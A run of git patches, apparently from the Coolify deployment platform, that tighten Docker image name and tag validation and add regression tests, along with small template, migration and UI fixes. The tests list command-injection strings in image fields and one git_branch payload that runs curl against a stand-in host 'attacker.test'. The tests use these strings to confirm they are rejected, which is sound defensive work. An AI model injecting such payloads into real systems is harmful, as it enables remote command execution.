+        if (! is_string($value)) {
+            $fail('The :attribute format is invalid. Use image:tag or image@sha256:hash format.');
+
+            return;
+        }
+
         // Check if the value contains ":sha256:" or ":sha" which is incorrect format
         if (preg_match('/:sha256?:/i', $value)) {
             $fail('The :attribute must use @ before sha256 digest (e.g., image@sha256:hash, not image:sha256:hash).');
@@ -21,20 +29,21 @@ public function validate(string $attribute, mixed $value, Closure $fail): void
             return;
         }
 
-        // Valid formats:
-        // 1. image:tag (e.g., nginx:latest)
-        // 2. registry/image:tag (e.g., ghcr.io/user/app:v1.2.3)
-        // 3. image@sha256:hash (e.g., nginx@sha256:abc123...)
-        // 4. registry/image@sha256:hash
-        // 5. registry:port/image:tag (e.g., localhost:5000/app:latest)
+        $imageName = $value;
+        $tag = null;
 
-        $pattern = '/^
-            (?:[a-z0-9]+(?:[._-][a-z0-9]+)*(?::[0-9]+)?\/)?  # Optional registry with optional port
-            [a-z0-9]+(?:[._\/-][a-z0-9]+)*                    # Image name (required)
-            (?::[a-z0-9][a-z0-9._-]*|@sha256:[a-f0-9]{64})?   # Optional :tag or @sha256:hash
-        $/ix';
+        if (preg_match('/\A(.+)@sha256:([a-f0-9]{64})\z/i', $value, $matches) === 1) {
+            $imageName = $matches[1];
+        } else {
+            $lastColon = strrpos($value, ':');
+            $lastSlash = strrpos($value, '/');
+            if ($lastColon !== false && ($lastSlash === false || $lastColon > $lastSlash)) {
+                $imageName = substr($value, 0, $lastColon);
+                $tag = substr($value, $lastColon + 1);
+            }
+        }
 
-        if (! preg_match($pattern, $value)) {
+        if (! ValidationPatterns::isValidDockerImageName($imageName) || ! ValidationPatterns::isValidDockerImageTag($tag)) {
             $fail('The :attribute format is invalid. Use image:tag or image@sha256:hash format.');
         }
     }
diff --git a/app/Support/ValidationPatterns.php b/app/Support/ValidationPatterns.php
index 07926e1cf..54397d4f1 100644
--- a/app/Support/ValidationPatterns.php
+++ b/app/Support/ValidationPatterns.php
@@ -102,6 +102,23 @@ class ValidationPatterns
      */
     public const DB_PASSWORD_PATTERN = '/^[A-Za-z0-9!@#%^*()_+\-=\[\]{}:,.?\/~]+$/';
 
+    /**
+     * Pattern for Docker image repository names without a tag.
+     *
+     * Allows an optional registry host/port followed by lowercase repository
+     * path components. A trailing @sha256 marker is accepted for existing
+     * digest-based dockerimage records that store the digest hash separately.
+     */
+    public const DOCKER_IMAGE_NAME_PATTERN = '/\A(?=.{1,255}\z)(?:(?:[a-z0-9](?:[a-z0-9.-]*[a-z0-9])?(?::[0-9]+)?\/)?[a-z0-9]+(?:(?:[._-]|__)[a-z0-9]+)*(?:\/[a-z0-9]+(?:(?:[._-]|__)[a-z0-9]+)*)*)(?:@sha256)?\z/';
+
+    /**
+     * Pattern for Docker image tags.
+     *
+     * Docker tags may contain letters, digits, underscores, dots, and hyphens,
+     * must start with an alphanumeric/underscore, and are limited to 128 chars.
+     */
+    public const DOCKER_IMAGE_TAG_PATTERN = '/\A[A-Za-z0-9_][A-Za-z0-9_.-]{0,127}\z/';
+
     /**
      * Normalize environment variable keys before validation and storage.
      */
@@ -163,6 +180,81 @@ public static function validatedEnvironmentVariableKey(string $value, string $la
         return $key;
     }
 
+    /**
+     * Get validation rules for Docker image repository names without tags.
+     */
+    public static function dockerImageNameRules(bool $required = false, int $maxLength = 255): array
+    {
+        $rules = [];
+
+        if ($required) {
+            $rules[] = 'required';
+        } else {
+            $rules[] = 'nullable';
+        }
+
+        $rules[] = 'string';
+        $rules[] = "max:$maxLength";
+        $rules[] = 'regex:'.self::DOCKER_IMAGE_NAME_PATTERN;
+
+        return $rules;
+    }
+
+    /**
+     * Get validation rules for Docker image tags.
+     */
+    public static function dockerImageTagRules(bool $required = false, int $maxLength = 128): array
+    {
+        $rules = [];
+
+        if ($required) {
+            $rules[] = 'required';
+        } else {
+            $rules[] = 'nullable';
+        }
+
+        $rules[] = 'string';
+        $rules[] = "max:$maxLength";
+        $rules[] = 'regex:'.self::DOCKER_IMAGE_TAG_PATTERN;
+
+        return $rules;
+    }
+
+    /**
+     * Get validation messages for Docker image fields.
+     */
+    public static function dockerImageMessages(string $nameField = 'docker_registry_image_name', string $tagField = 'docker_registry_image_tag'): array
+    {
+        return [
+            "{$nameField}.regex" => 'The Docker registry image name must be a valid image repository without a tag and may not contain shell metacharacters.',
+            "{$tagField}.regex" => 'The Docker registry image tag must be a valid Docker tag and may not contain shell metacharacters.',
+        ];
+    }
+
+    /**
+     * Check if a string is a valid Docker image repository name without a tag.
+     */
+    public static function isValidDockerImageName(?string $value): bool
+    {
+        if (blank($value)) {
+            return true;
+        }
+
+        return preg_match(self::DOCKER_IMAGE_NAME_PATTERN, $value) === 1;
+    }
+
+    /**
+     * Check if a string is a valid Docker image tag.
+     */
+    public static function isValidDockerImageTag(?string $value): bool
+    {
+        if (blank($value)) {
+            return true;
+        }
+
+        return preg_match(self::DOCKER_IMAGE_TAG_PATTERN, $value) === 1;
+    }
+
     /**
      * Get validation rules for database identifier fields (username, database name).
      *
diff --git a/bootstrap/helpers/api.php b/bootstrap/helpers/api.php
index 4b76200d2..656daf08c 100644
--- a/bootstrap/helpers/api.php
+++ b/bootstrap/helpers/api.php
@@ -3,6 +3,7 @@
 use App\Enums\BuildPackTypes;
 use App\Enums\RedirectTypes;
 use App\Enums\StaticImageTypes;
+use App\Support\ValidationPatterns;
 use Illuminate\Database\Eloquent\Collection;
 use Illuminate\Http\Request;
 use Illuminate\Validation\Rule;
@@ -93,16 +94,16 @@ function sharedDataApplications()
         'domains' => 'string|nullable',
         'redirect' => Rule::enum(RedirectTypes::class),
         'git_commit_sha' => ['string', 'regex:/^[a-zA-Z0-9][a-zA-Z0-9._\-\/]*$/'],
-        'docker_registry_image_name' => 'string|nullable',
-        'docker_registry_image_tag' => 'string|nullable',
-        'install_command' => \App\Support\ValidationPatterns::shellSafeCommandRules(),
-        'build_command' => \App\Support\ValidationPatterns::shellSafeCommandRules(),
-        'start_command' => \App\Support\ValidationPatterns::shellSafeCommandRules(),
+        'docker_registry_image_name' => ValidationPatterns::dockerImageNameRules(),
+        'docker_registry_image_tag' => ValidationPatterns::dockerImageTagRules(),
+        'install_command' => ValidationPatterns::shellSafeCommandRules(),
+        'build_command' => ValidationPatterns::shellSafeCommandRules(),
+        'start_command' => ValidationPatterns::shellSafeCommandRules(),
         'ports_exposes' => 'string|regex:/^(\d+)(,\d+)*$/',
         'ports_mappings' => 'string|regex:/^(\d+:\d+)(,\d+:\d+)*$/|nullable',
         'custom_network_aliases' => 'string|nullable',
-        'base_directory' => \App\Support\ValidationPatterns::directoryPathRules(),
-        'publish_directory' => \App\Support\ValidationPatterns::directoryPathRules(),
+        'base_directory' => ValidationPatterns::directoryPathRules(),
+        'publish_directory' => ValidationPatterns::directoryPathRules(),
         'health_check_enabled' => 'boolean',
         'health_check_type' => 'string|in:http,cmd',
         'health_check_command' => ['nullable', 'string', 'max:1000', 'regex:/^[a-zA-Z0-9 \-_.\/:=@,+]+$/'],
@@ -125,24 +126,24 @@ function sharedDataApplications()
         'limits_cpuset' => 'string|nullable',
         'limits_cpu_shares' => 'numeric',
         'custom_labels' => 'string|nullable',
-        'custom_docker_run_options' => \App\Support\ValidationPatterns::shellSafeCommandRules(2000),
+        'custom_docker_run_options' => ValidationPatterns::shellSafeCommandRules(2000),
         // Security: deployment commands are intentionally arbitrary shell (e.g. "php artisan migrate").
         // Access is gated by API token authentication. Commands run inside the app container, not the host.
         'post_deployment_command' => 'string|nullable',
-        'post_deployment_command_container' => \App\Support\ValidationPatterns::containerNameRules(),
+        'post_deployment_command_container' => ValidationPatterns::containerNameRules(),
         'pre_deployment_command' => 'string|nullable',
-        'pre_deployment_command_container' => \App\Support\ValidationPatterns::containerNameRules(),
+        'pre_deployment_command_container' => ValidationPatterns::containerNameRules(),
         'manual_webhook_secret_github' => 'string|nullable',
         'manual_webhook_secret_gitlab' => 'string|nullable',
         'manual_webhook_secret_bitbucket' => 'string|nullable',
         'manual_webhook_secret_gitea' => 'string|nullable',
-        'dockerfile_location' => \App\Support\ValidationPatterns::filePathRules(),
-        'dockerfile_target_build' => \App\Support\ValidationPatterns::dockerTargetRules(),
-        'docker_compose_location' => \App\Support\ValidationPatterns::filePathRules(),
+        'dockerfile_location' => ValidationPatterns::filePathRules(),
+        'dockerfile_target_build' => ValidationPatterns::dockerTargetRules(),
+        'docker_compose_location' => ValidationPatterns::filePathRules(),
         'docker_compose' => 'string|nullable',
         'docker_compose_domains' => 'array|nullable',
-        'docker_compose_custom_start_command' => \App\Support\ValidationPatterns::shellSafeCommandRules(),
-        'docker_compose_custom_build_command' => \App\Support\ValidationPatterns::shellSafeCommandRules(),
+        'docker_compose_custom_start_command' => ValidationPatterns::shellSafeCommandRules(),
+        'docker_compose_custom_build_command' => ValidationPatterns::shellSafeCommandRules(),
         'is_container_label_escape_enabled' => 'boolean',
         'is_preserve_repository_enabled' => 'boolean',
     ];
diff --git a/tests/Feature/ApplicationDockerRegistryImageValidationApiTest.php b/tests/Feature/ApplicationDockerRegistryImageValidationApiTest.php
new file mode 100644
index 000000000..852b537ec
--- /dev/null
+++ b/tests/Feature/ApplicationDockerRegistryImageValidationApiTest.php
@@ -0,0 +1,108 @@
+<?php
+
+use App\Models\Application;
+use App\Models\Environment;
+use App\Models\Project;
+use App\Models\Server;
+use App\Models\StandaloneDocker;
+use App\Models\Team;
+use App\Models\User;
+use Illuminate\Foundation\Testing\RefreshDatabase;
+use Illuminate\Support\Str;
+
+uses(RefreshDatabase::class);
+
+beforeEach(function () {
+    $this->team = Team::factory()->create();
+    $this->user = User::factory()->create();
+    $this->team->members()->attach($this->user->id, ['role' => 'owner']);
+
+    $plainTextToken = Str::random(40);
+    $token = $this->user->tokens()->create([
+        'name' => 'docker-registry-validation-api-test-'.Str::random(6),
+        'token' => hash('sha256', $plainTextToken),
+        'abilities' => ['*'],
+        'team_id' => $this->team->id,
+    ]);
+    $this->bearerToken = $token->getKey().'|'.$plainTextToken;
+
+    $this->server = Server::factory()->create(['team_id' => $this->team->id]);
+    $this->destination = StandaloneDocker::factory()->create([
+        'server_id' => $this->server->id,
+        'network' => 'coolify-'.Str::lower(Str::random(8)),
+    ]);
+    $this->project = Project::factory()->create(['team_id' => $this->team->id]);
+    $this->environment = Environment::factory()->create(['project_id' => $this->project->id]);
+});
+
+function dockerRegistryApiHeaders(string $bearerToken): array
+{
+    return [
+        'Authorization' => 'Bearer '.$bearerToken,
+        'Content-Type' => 'application/json',
+    ];
+}
+
+function makeDockerRegistryValidationApplication(array $overrides = []): Application
+{
+    return Application::factory()->create(array_merge([
+        'environment_id' => test()->environment->id,
+        'destination_id' => test()->destination->id,
+        'destination_type' => test()->destination->getMorphClass(),
+        'build_pack' => 'nixpacks',
+        'docker_registry_image_name' => 'ghcr.io/coollabsio/example',
+        'docker_registry_image_tag' => 'latest',
+    ], $overrides));
+}
+
+describe('PATCH /api/v1/applications/{uuid} docker registry image validation', function () {
+    test('rejects shell metacharacters in docker registry image name without persisting them', function () {
+        $application = makeDockerRegistryValidationApplication();
+
+        $response = $this->withHeaders(dockerRegistryApiHeaders($this->bearerToken))
+            ->patchJson("/api/v1/applications/{$application->uuid}", [
+                'docker_registry_image_name' => 'coolify/poc$(touch /tmp/pwned)',
+                'docker_registry_image_tag' => 'latest',
+            ]);
+
+        $response->assertUnprocessable()
+            ->assertInvalid(['docker_registry_image_name']);
+
+        $application->refresh();
+        expect($application->docker_registry_image_name)->toBe('ghcr.io/coollabsio/example')
+            ->and($application->docker_registry_image_tag)->toBe('latest');
+    });
+
+    test('rejects shell metacharacters in docker registry image tag without persisting them', function () {
+        $application = makeDockerRegistryValidationApplication();
+
+        $response = $this->withHeaders(dockerRegistryApiHeaders($this->bearerToken))
+            ->patchJson("/api/v1/applications/{$application->uuid}", [
+                'docker_registry_image_name' => 'ghcr.io/coollabsio/example',
+                'docker_registry_image_tag' => 'latest$(touch /tmp/pwned)',
+            ]);
+
+        $response->assertUnprocessable()
+            ->assertInvalid(['docker_registry_image_tag']);
+
+        $application->refresh();
+        expect($application->docker_registry_image_name)->toBe('ghcr.io/coollabsio/example')
+            ->and($application->docker_registry_image_tag)->toBe('latest');
+    });
+
+    test('accepts valid docker registry image values', function () {
+        $application = makeDockerRegistryValidationApplication();
+
+        $response = $this->withHeaders(dockerRegistryApiHeaders($this->bearerToken))
+            ->patchJson("/api/v1/applications/{$application->uuid}", [
+                'docker_registry_image_name' => 'registry.example.com:5000/team/app',
+                'docker_registry_image_tag' => 'v1.2.3',
+            ]);
+
+        $response->assertOk();
+
+        $application->refresh();
+        expect($application->docker_registry_image_name)->toBe('registry.example.com:5000/team/app')
+            ->and($application->docker_registry_image_tag)->toBe('v1.2.3');
+    });
+});
diff --git a/tests/Feature/Livewire/ApplicationGeneralDockerRegistryImageValidationTest.php b/tests/Feature/Livewire/ApplicationGeneralDockerRegistryImageValidationTest.php
new file mode 100644
index 000000000..34c889837
--- /dev/null
+++ b/tests/Feature/Livewire/ApplicationGeneralDockerRegistryImageValidationTest.php
@@ -0,0 +1,21 @@
+<?php
+
+use App\Livewire\Project\Application\General;
+
+it('uses safe docker registry image validation rules in the application general form', function () {
+    $component = new General;
+    $method = new ReflectionMethod($component, 'rules');
+    $rules = $method->invoke($component);
+
+    $validator = validator([
+        'dockerRegistryImageName' => 'coolify/poc$(touch /tmp/pwned)',
+        'dockerRegistryImageTag' => 'latest$(touch /tmp/pwned)',
+    ], [
+        'dockerRegistryImageName' => $rules['dockerRegistryImageName'],
+        'dockerRegistryImageTag' => $rules['dockerRegistryImageTag'],
+    ]);
+
+    expect($validator->fails())->toBeTrue()
+        ->and($validator->errors()->has('dockerRegistryImageName'))->toBeTrue()
+        ->and($validator->errors()->has('dockerRegistryImageTag'))->toBeTrue();
+});
diff --git a/tests/Unit/DockerImageReferenceValidationTest.php b/tests/Unit/DockerImageReferenceValidationTest.php
new file mode 100644
index 000000000..d6bf2ebd5
--- /dev/null
+++ b/tests/Unit/DockerImageReferenceValidationTest.php
@@ -0,0 +1,108 @@
+<?php
+
+use App\Exceptions\DeploymentException;
+use App\Jobs\ApplicationDeploymentJob;
+use App\Models\Application;
+use App\Models\ApplicationDeploymentQueue;
+use App\Rules\DockerImageFormat;
+use App\Support\ValidationPatterns;
+
+it('accepts valid docker registry image names', function (string $imageName) {
+    expect(ValidationPatterns::isValidDockerImageName($imageName))->toBeTrue();
+})->with([
+    'single component' => 'nginx',
+    'namespace image' => 'library/nginx',
+    'ghcr image' => 'ghcr.io/coollabsio/coolify',
+    'registry with port' => 'registry.example.com:5000/team/app',
+    'digest marker used by existing dockerimage records' => 'nginx@sha256',
+]);
+
+it('rejects docker registry image names with shell metacharacters', function (string $imageName) {
+    expect(ValidationPatterns::isValidDockerImageName($imageName))->toBeFalse();
+})->with([
+    'command substitution' => 'coolify/poc$(touch /tmp/pwned)',
+    'semicolon' => 'coolify/poc;id',
+    'backticks' => 'coolify/poc`id`',
+    'pipe' => 'coolify/poc|id',
+    'logical and' => 'coolify/poc&&id',
+    'newline' => "coolify/poc\nid",
+    'space' => 'coolify/poc image',
+    'tag in image-name-only field' => 'coolify/poc:latest',
+]);
+
+it('accepts valid docker registry image tags', function (string $tag) {
+    expect(ValidationPatterns::isValidDockerImageTag($tag))->toBeTrue();
+})->with([
+    'latest' => 'latest',
+    'version' => 'v1.2.3',
+    'uppercase and underscore' => 'PR_123',
+    'sha256 hash' => '1234567890abcdef1234567890abcdef1234567890abcdef1234567890abcdef',
+    'legacy sha256 prefixed hash' => 'sha256-1234567890abcdef1234567890abcdef1234567890abcdef1234567890abcdef',
+]);
+
+it('rejects docker registry image tags with shell metacharacters', function (string $tag) {
+    expect(ValidationPatterns::isValidDockerImageTag($tag))->toBeFalse();
+})->with([
+    'command substitution' => 'latest$(touch /tmp/pwned)',
+    'semicolon' => 'latest;id',
+    'backticks' => 'latest`id`',
+    'pipe' => 'latest|id',
+    'logical and' => 'latest&&id',
+    'newline' => "latest\nid",
+]);
+
+it('accepts supported full docker image reference formats', function (string $imageReference) {
+    $failures = [];
+
+    (new DockerImageFormat)->validate('image', $imageReference, function (string $message) use (&$failures): void {
+        $failures[] = $message;
+    });
+
+    expect($failures)->toBeEmpty();
+})->with([
+    'image with tag' => 'nginx:latest',
+    'registry image with tag' => 'ghcr.io/user/app:v1.2.3',
+    'image with sha256 digest' => 'nginx@sha256:1234567890abcdef1234567890abcdef1234567890abcdef1234567890abcdef',
+    'registry image with sha256 digest' => 'ghcr.io/user/app@sha256:1234567890abcdef1234567890abcdef1234567890abcdef1234567890abcdef',
+    'registry port image with tag' => 'localhost:5000/app:latest',
+]);
+
+it('rejects unsupported full docker image reference formats', function (string $imageReference) {
+    $failures = [];
+
+    (new DockerImageFormat)->validate('image', $imageReference, function (string $message) use (&$failures): void {
+        $failures[] = $message;
+    });
+
+    expect($failures)->not->toBeEmpty();
+})->with([
+    'colon sha256 marker' => 'nginx:sha256:1234567890abcdef1234567890abcdef1234567890abcdef1234567890abcdef',
+    'command substitution' => 'nginx:latest$(touch /tmp/pwned)',
+    'newline' => "nginx:latest\nid",
+]);
+
+it('stops deployments when a stored docker registry image value is unsafe', function () {
+    $job = (new ReflectionClass(ApplicationDeploymentJob::class))->newInstanceWithoutConstructor();
+
+    $application = new Application([
+        'docker_registry_image_name' => 'coolify/poc$(touch /tmp/pwned)',
+        'docker_registry_image_tag' => 'latest',
+    ]);
+    $deploymentQueue = new ApplicationDeploymentQueue([
+        'docker_registry_image_tag' => null,
+    ]);
+
+    $jobReflection = new ReflectionClass($job);
+    foreach ([
+        'application' => $application,
+        'application_deployment_queue' => $deploymentQueue,
+        'dockerImagePreviewTag' => null,
+    ] as $property => $value) {
+        $reflectionProperty = $jobReflection->getProperty($property);
+        $reflectionProperty->setValue($job, $value);
+    }
+
+    $method = $jobReflection->getMethod('validateDockerRegistryImageConfiguration');
+
+    expect(fn () => $method->invoke($job))->toThrow(DeploymentException::class);
+});

From 60ba03427a6f6b2a57f11b860a1af24f1de06af2 Mon Sep 17 00:00:00 2001
From: Alexey Lysenko <abesmon@gmail.com>
Date: Tue, 2 Jun 2026 12:12:42 +0300
Subject: [PATCH 72/90] Update owncloud.yaml

fix for https://github.com/coollabsio/coolify/issues/9944
---
 templates/compose/owncloud.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/templates/compose/owncloud.yaml b/templates/compose/owncloud.yaml
index 689a03504..c341a5390 100644
--- a/templates/compose/owncloud.yaml
+++ b/templates/compose/owncloud.yaml
@@ -15,8 +15,8 @@ services:
         condition: service_healthy
     environment:
       - SERVICE_URL_OWNCLOUD_8080
-      - OWNCLOUD_DOMAIN=${SERVICE_URL_OWNCLOUD}
-      - OWNCLOUD_TRUSTED_DOMAINS=${SERVICE_URL_OWNCLOUD}
+      - OWNCLOUD_DOMAIN=${SERVICE_FQDN_OWNCLOUD}
+      - OWNCLOUD_TRUSTED_DOMAINS=${SERVICE_FQDN_OWNCLOUD}
       - OWNCLOUD_DB_TYPE=mysql
       - OWNCLOUD_DB_HOST=mariadb
       - OWNCLOUD_DB_NAME=${DB_NAME:-owncloud}

From fb4c3aa22e56cd7919d9fca28e8d6e3ba3458302 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Tue, 2 Jun 2026 11:27:25 +0200
Subject: [PATCH 73/90] fix(applications): allow repeated hyphens in image
 names

---
 app/Support/ValidationPatterns.php                | 2 +-
 tests/Unit/DockerImageReferenceValidationTest.php | 1 +
 2 files changed, 2 insertions(+), 1 deletion(-)

diff --git a/app/Support/ValidationPatterns.php b/app/Support/ValidationPatterns.php
index 54397d4f1..7e3974dd7 100644
--- a/app/Support/ValidationPatterns.php
+++ b/app/Support/ValidationPatterns.php
@@ -109,7 +109,7 @@ class ValidationPatterns
      * path components. A trailing @sha256 marker is accepted for existing
      * digest-based dockerimage records that store the digest hash separately.
      */
-    public const DOCKER_IMAGE_NAME_PATTERN = '/\A(?=.{1,255}\z)(?:(?:[a-z0-9](?:[a-z0-9.-]*[a-z0-9])?(?::[0-9]+)?\/)?[a-z0-9]+(?:(?:[._-]|__)[a-z0-9]+)*(?:\/[a-z0-9]+(?:(?:[._-]|__)[a-z0-9]+)*)*)(?:@sha256)?\z/';
+    public const DOCKER_IMAGE_NAME_PATTERN = '/\A(?=.{1,255}\z)(?:(?:[a-z0-9](?:[a-z0-9.-]*[a-z0-9])?(?::[0-9]+)?\/)?[a-z0-9]+(?:(?:[._]|__|-+)[a-z0-9]+)*(?:\/[a-z0-9]+(?:(?:[._]|__|-+)[a-z0-9]+)*)*)(?:@sha256)?\z/';
 
     /**
      * Pattern for Docker image tags.
diff --git a/tests/Unit/DockerImageReferenceValidationTest.php b/tests/Unit/DockerImageReferenceValidationTest.php
index d6bf2ebd5..5ee85f24b 100644
--- a/tests/Unit/DockerImageReferenceValidationTest.php
+++ b/tests/Unit/DockerImageReferenceValidationTest.php
@@ -13,6 +13,7 @@
     'single component' => 'nginx',
     'namespace image' => 'library/nginx',
     'ghcr image' => 'ghcr.io/coollabsio/coolify',
+    'repository component with repeated hyphens' => 'ghcr.io/acme/my--service',
     'registry with port' => 'registry.example.com:5000/team/app',
     'digest marker used by existing dockerimage records' => 'nginx@sha256',
 ]);

From 47682a3085699213bde02fbf7275b2fcf3bbf90b Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Tue, 2 Jun 2026 11:41:24 +0200
Subject: [PATCH 74/90] fix(db): skip postgres tuning outside pgsql

Guard the fillfactor/autovacuum migration on non-Postgres connections.
Add API regression coverage for command-substitution git_branch payloads.
---
 ...une_postgres_fillfactor_and_autovacuum.php |  8 ++
 .../Api/ApplicationGitBranchSecurityTest.php  | 89 +++++++++++++++++++
 2 files changed, 97 insertions(+)
 create mode 100644 tests/Feature/Api/ApplicationGitBranchSecurityTest.php

diff --git a/database/migrations/2026_05_27_000001_tune_postgres_fillfactor_and_autovacuum.php b/database/migrations/2026_05_27_000001_tune_postgres_fillfactor_and_autovacuum.php
index d8bb9b625..a90723633 100644
--- a/database/migrations/2026_05_27_000001_tune_postgres_fillfactor_and_autovacuum.php
+++ b/database/migrations/2026_05_27_000001_tune_postgres_fillfactor_and_autovacuum.php
@@ -7,6 +7,10 @@
 {
     public function up(): void
     {
+        if (DB::connection()->getDriverName() !== 'pgsql') {
+            return;
+        }
+
         // Fillfactor < 100 leaves free space per page so Postgres can do HOT
         // (Heap-Only Tuple) in-place updates instead of allocating a new tuple
         // elsewhere. Coolify's hot-update tables churn rows on every Sentinel
@@ -40,6 +44,10 @@ public function up(): void
 
     public function down(): void
     {
+        if (DB::connection()->getDriverName() !== 'pgsql') {
+            return;
+        }
+
         DB::statement('ALTER TABLE applications RESET (fillfactor, autovacuum_vacuum_scale_factor)');
         DB::statement('ALTER TABLE servers RESET (fillfactor, autovacuum_vacuum_scale_factor)');
         DB::statement('ALTER TABLE services RESET (fillfactor)');
diff --git a/tests/Feature/Api/ApplicationGitBranchSecurityTest.php b/tests/Feature/Api/ApplicationGitBranchSecurityTest.php
new file mode 100644
index 000000000..58bd6b5c0
--- /dev/null
+++ b/tests/Feature/Api/ApplicationGitBranchSecurityTest.php
@@ -0,0 +1,89 @@
+<?php
+
+use App\Models\Application;
+use App\Models\InstanceSettings;
+use App\Models\Project;
+use App\Models\Server;
+use App\Models\StandaloneDocker;
+use App\Models\Team;
+use App\Models\User;
+use Illuminate\Foundation\Testing\RefreshDatabase;
+use Illuminate\Support\Str;
+use Visus\Cuid2\Cuid2;
+
+uses(RefreshDatabase::class);
+
+beforeEach(function () {
+    InstanceSettings::unguarded(fn () => InstanceSettings::firstOrCreate(['id' => 0]));
+
+    $this->team = Team::factory()->create();
+    $this->user = User::factory()->create();
+    $this->team->members()->attach($this->user->id, ['role' => 'owner']);
+    session(['currentTeam' => $this->team]);
+
+    $plainTextToken = Str::random(40);
+    $token = $this->user->tokens()->create([
+        'name' => 'git-branch-security-test-'.Str::random(6),
+        'token' => hash('sha256', $plainTextToken),
+        'abilities' => ['*'],
+        'team_id' => $this->team->id,
+    ]);
+    $this->bearerToken = $token->getKey().'|'.$plainTextToken;
+
+    $this->server = Server::factory()->create(['team_id' => $this->team->id]);
+
+    StandaloneDocker::withoutEvents(function () {
+        $this->destination = $this->server->standaloneDockers()->firstOrCreate(
+            ['network' => 'coolify'],
+            ['uuid' => (string) new Cuid2, 'name' => 'test-docker']
+        );
+    });
+
+    $this->project = Project::create([
+        'uuid' => (string) new Cuid2,
+        'name' => 'test-project',
+        'team_id' => $this->team->id,
+    ]);
+    $this->environment = $this->project->environments()->first();
+    $this->application = Application::factory()->create([
+        'environment_id' => $this->environment->id,
+        'destination_id' => $this->destination->id,
+        'destination_type' => $this->destination->getMorphClass(),
+        'git_branch' => 'main',
+    ]);
+});
+
+function gitBranchApiHeaders(string $bearerToken): array
+{
+    return [
+        'Authorization' => 'Bearer '.$bearerToken,
+        'Content-Type' => 'application/json',
+    ];
+}
+
+describe('PATCH /api/v1/applications/{uuid} git_branch security', function () {
+    test('rejects backtick command substitution branch payloads', function () {
+        $payload = 'main`curl${IFS}attacker.test/coolify-rce-`id${IFS}-u``';
+
+        $response = $this->withHeaders(gitBranchApiHeaders($this->bearerToken))
+            ->patchJson("/api/v1/applications/{$this->application->uuid}", [
+                'git_branch' => $payload,
+            ]);
+
+        $response->assertUnprocessable()
+            ->assertJsonValidationErrors('git_branch');
+
+        expect($this->application->refresh()->git_branch)->toBe('main');
+    });
+
+    test('accepts safe branch names', function () {
+        $response = $this->withHeaders(gitBranchApiHeaders($this->bearerToken))
+            ->patchJson("/api/v1/applications/{$this->application->uuid}", [
+                'git_branch' => 'feature/safe-branch_1.2.3',
+            ]);
+
+        $response->assertOk();
+
+        expect($this->application->refresh()->git_branch)->toBe('feature/safe-branch_1.2.3');
+    });
+});

From 88622ba7ea4046a6b8dbd3b7e78347302cd5d1ab Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Tue, 2 Jun 2026 11:54:38 +0200
Subject: [PATCH 75/90] fix(ui): prevent persisted sidebar restore animation

Remove Railpack example applications from the default seed data and update
seed tests to assert they are no longer created.
---
 database/seeders/ApplicationSeeder.php        | 32 -------------------
 .../seeders/ApplicationSettingsSeeder.php     |  7 ----
 resources/views/components/navbar.blade.php   |  4 +--
 resources/views/layouts/app.blade.php         | 24 ++++++++------
 tests/Feature/ApplicationSeederTest.php       | 18 ++---------
 tests/Feature/SidebarNavigationMarkupTest.php | 19 +++++++++++
 6 files changed, 38 insertions(+), 66 deletions(-)
 create mode 100644 tests/Feature/SidebarNavigationMarkupTest.php

diff --git a/database/seeders/ApplicationSeeder.php b/database/seeders/ApplicationSeeder.php
index 212bcce79..2a0273e0f 100644
--- a/database/seeders/ApplicationSeeder.php
+++ b/database/seeders/ApplicationSeeder.php
@@ -47,22 +47,6 @@ public function run(): void
             'source_id' => 1,
             'source_type' => GithubApp::class,
         ]);
-        Application::create([
-            'uuid' => 'railpack-nodejs',
-            'name' => 'Railpack NodeJS Fastify Example',
-            'fqdn' => 'http://railpack-nodejs.127.0.0.1.sslip.io',
-            'repository_project_id' => 603035348,
-            'git_repository' => 'coollabsio/coolify-examples',
-            'git_branch' => 'v4.x',
-            'base_directory' => '/nodejs',
-            'build_pack' => 'railpack',
-            'ports_exposes' => '3000',
-            'environment_id' => 1,
-            'destination_id' => 0,
-            'destination_type' => StandaloneDocker::class,
-            'source_id' => 1,
-            'source_type' => GithubApp::class,
-        ]);
         Application::create([
             'uuid' => 'dockerfile',
             'name' => 'Dockerfile Example',
@@ -161,21 +145,5 @@ public function run(): void
             'source_id' => 1,
             'source_type' => GitlabApp::class,
         ]);
-        Application::create([
-            'uuid' => 'railpack-static',
-            'name' => 'Railpack Static Example',
-            'fqdn' => 'http://railpack-static.127.0.0.1.sslip.io',
-            'repository_project_id' => 603035348,
-            'git_repository' => 'coollabsio/coolify-examples',
-            'git_branch' => 'v4.x',
-            'base_directory' => '/static',
-            'build_pack' => 'railpack',
-            'ports_exposes' => '80',
-            'environment_id' => 1,
-            'destination_id' => 0,
-            'destination_type' => StandaloneDocker::class,
-            'source_id' => 1,
-            'source_type' => GithubApp::class,
-        ]);
     }
 }
diff --git a/database/seeders/ApplicationSettingsSeeder.php b/database/seeders/ApplicationSettingsSeeder.php
index e8be0ba70..87236df8a 100644
--- a/database/seeders/ApplicationSettingsSeeder.php
+++ b/database/seeders/ApplicationSettingsSeeder.php
@@ -22,12 +22,5 @@ public function run(): void
             $gitlabPublic->settings->is_static = true;
             $gitlabPublic->settings->save();
         }
-
-        $railpackStatic = Application::where('uuid', 'railpack-static')->first();
-        if ($railpackStatic) {
-            $railpackStatic->load(['settings']);
-            $railpackStatic->settings->is_static = true;
-            $railpackStatic->settings->save();
-        }
     }
 }
diff --git a/resources/views/components/navbar.blade.php b/resources/views/components/navbar.blade.php
index a8a9aaf76..ecd798cc2 100644
--- a/resources/views/components/navbar.blade.php
+++ b/resources/views/components/navbar.blade.php
@@ -101,7 +101,7 @@
                 }
             }
     }">
-    <div class="flex pt-4 pb-4 pl-2 pr-3 items-start gap-3 motion-safe:transition-all motion-safe:duration-200 motion-safe:ease-out motion-reduce:transition-none"
+    <div class="flex pt-4 pb-4 pl-2 pr-3 items-start gap-3"
         :class="collapsed ? 'lg:flex-col lg:items-center lg:pl-0 lg:pr-0 lg:gap-3 lg:pt-7' : 'lg:pt-6'">
         <div class="flex min-w-0 flex-1 flex-col" :class="collapsed && 'lg:hidden'">
